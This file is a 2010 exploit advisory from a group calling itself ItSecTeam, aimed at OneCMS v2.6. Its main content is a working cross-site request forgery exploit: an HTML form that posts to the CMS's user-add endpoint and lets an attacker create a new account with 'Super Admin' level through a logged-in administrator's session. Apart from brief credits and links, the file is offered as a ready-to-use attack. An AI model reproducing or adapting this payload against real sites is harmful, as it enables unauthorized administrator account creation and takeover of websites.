onecms-xsrf.txt
Posted on 30 March 2010
( #Topic : OneCMS_v2.6 2010-03-25 ( #Bug type : remote add admin user exploit ( #Download : http://sourceforge.net/projects/onecms/files/onecms/v2.6/OneCMS_v2.6.zip/download =========================================================================== ( #Author : ItSecTeam ( #Email : Bug@ITSecTeam.com ( #Website: http://www.itsecteam.com ( #Forum : http://forum.ITSecTeam.com ( #Original Advisory : www.ITSecTeam.com/en/vulnerabilities/vulnerability29.htm ( #coded by ahmadbady ( #Special Tnx : PLATEN , 0xd41684c654 , b3hz4d , Pejvak , Cdef3nder , mijax , r3dm0v3 , M3hr@n.S And All Team Members! --------------------------------------------------------------------- exploit: <html> <head> <body> <form action='users.php?load=users&view=add2' method='post'> <table cellspacing="0" cellpadding="3" border="0" align="left"> <tr><td>Username</td><td><input type="text" name='name'></td></tr> <tr><td>Password</td><td><input type="password" name='password1'></td> </tr><tr><td>E-Mail</td><td><input type="text" name='email'></td></tr><tr> <td>User Level</td><td><select name='level' multiple size='5'> <option value="Super Admin">Super Admin</option> <option value="Member">Member</option> <option value="Super Staff">Super Staff</option> <option value="Staff">Staff</option> <input type="submit" name="Add" value="Add User"></td></tr></form></table></td> </tr></table><tr><td width="100%" height="9"></td><tr><tr><td/> </body> </html> ---------------------------------------------------------------------
